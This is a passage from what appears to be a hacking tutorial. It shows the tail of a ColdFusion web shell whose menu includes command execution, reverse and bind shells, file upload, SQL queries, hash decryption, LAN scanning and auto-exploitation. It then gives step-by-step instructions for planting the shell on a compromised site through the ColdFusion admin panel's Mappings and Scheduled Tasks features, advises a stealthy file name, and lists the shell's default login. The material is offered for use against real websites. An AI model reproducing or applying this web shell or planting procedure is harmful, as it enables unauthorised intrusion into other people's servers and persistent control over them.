instream.close();
socket.close();
break;
}
//———————//
// Invalid command
default:
{
break;
}
//———————//
}
}
}
else {
outstream.println(“PONG #str.substring(5)#”);
outstream.flush();
}
//————————————————–//

}

}catch (Exception e) {
writeoutput(“Exception: Error#chr(10)#”);
}
</cfscript>
<cfcatch>Connection terminated</cfcatch>
</cftry>
</textarea>
<cfelse>
<pre>Waiting for input</pre>
<textarea class=”report” rows=”20″>Welcome to &fnof;uZE Shell</textarea>
</cfif>
</cfoutput></td><td width=”25%”>
<div class=”container”>
<div class=”menu”>
<div id=’nav’><a href=”#execute” name=”modal”>:: Execute command on server ::</a></div>
<div id=’nav’><a href=”#reverse” name=”modal”>:: Reverse shell ::</a></div>
<div id=’nav’><a href=”#functions” name=”modal”>:: Functions ::</a></div>
<div id=’nav’><a href=”#updown” name=”modal”>:: Upload/download files on server ::</a></div>
<div id=’nav’><a href=”#runsql” name=”modal”>:: Run SQL query ::</a></div>
<div id=’nav’><a href=”#registry” name=”modal”>:: Registry ::</a></div>
<div id=’nav’><a href=”#edit” name=”modal”>:: Edit file ::</a></div>
<div id=’nav’><a href=”#bind” name=”modal”>:: Bindshell ::</a></div>
<div id=’nav’><a href=”#decrypt” name=”modal”>:: CF hash decrypter ::</a></div>
<div id=’nav’><a href=”#upremote” name=”modal”>:: Upload files from remote server ::</a></div>
<div id=’nav’><a href=”#scanlan” name=”modal”>:: Scan LAN for CF ::</a></div>
<div id=’nav’><a href=”#autopwn” name=”modal”>:: AutoPWN remote CF ::</a></div>
<div id=’nav’><a href=”#irc” name=”modal”>:: IRC datapipe ::</a></div>
<div id=’nav’><a href=”#nuke” name=”modal”>:: Nuke shell ::</a></div>
</div>
</div>
</td></tr>
</table>
<div>
<cfset tickEnd = GetTickCount()>
<cfset loopTime = tickEnd – tickBegin>
<center><pre>XiX<blink>_</blink> | &fnof;uZE | <cfoutput>#loopTime#ms</cfoutput></pre></center>
</cfif>
</div>
<cfif IsUserLoggedIn() eq “No”>
<cfform name=”LoginForm” method=”post” format=”html”>
<center>
<table border=”1″ cellpadding=”5″ cellspacing=”0″>
<tr>
<td colspan=”2″ align=”center”>
<img src=”<cfoutput>#icon#</cfoutput>”>
</td>
</tr>
<tr valign=”top”>
<td>UserName</td>
<td>
<cfinput name=”UserName” type=”text” id=”_color” style=”background-color:666666; color:White; width:250px; height:25px;”>
</td>
</tr>
<tr valign=”top”>
<td>Password</td>
<td>
<cfinput name=”Password” type=”password” style=”background-color:666666; color:White; width:250px; height:25px;”>
</td>
</tr>
<tr valign=”top”>
<td colspan=”2″ align=”right”>
<cfinput class=”_btn” type=”submit” name=”LoginButton” value=”Login”>
</td>
</tr>
</table>
</center>
</cfform>
</cfif>

</body>

</html>

Save this to your user area (on your PC) as filename.cfm for quick access in the future. Just in case you use the raw shell location, although the raw shell code is what you need for shelling the site.

Now, here comes the shelling. Once you’re in the administrator panel of ColdFusion head on over to the “Settings Summary” tab on the left hand side of the panel, and find the “Mappings” section. This page shows you the full path disclosure of the CFIDE location. One of the default mappings is /CFIDE. This is where we will be writing the shell to, as that is the /CFIDE/ part of the website you’re in currently. Copy the full path next to where it says /CFIDE.

Next, we need to head on over to the “Debugging and Logging” tab on the left panel and click “Scheduled Tasks”. This allows us to run a task on the site (and with a little persuasion, shell the server by uploading a script). Click “Schedule New Task”. Set the task name to whatever, it doesn’t really matter, if you want to be more stealthy put something like “Scheduled Configuration”.

Now, we change the “URL” part of the page to the RAW shell source. Hence why I supplied you with a pastebin in raw format. You can use raw pastebin links unless it is blocked by the sites Firewall. Check the option to save the output to a file. Paste the path you copied from “Mappings” into the “File” field. Type the name you want to save the shell as and the extension (cfm). So, as this is going in the /CFIDE/ directory off the site, name it something like “confg.cfm”.

Double check to make sure you have done everything correctly according to this tutorial and then click “OK”. Then when the page reloads, click the green check/tick to run the task. This will then upload your shell!

If everything is done correctly, your shell will be uploaded! Now to access the shell:

Code:

http://yourhackedsite.com/CFIDE/yourshellname.cfm

You will be challenged with login information. If you used the default settings from the above script then these will be your details:

 

Code:

Ultimate:pass123

 

Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *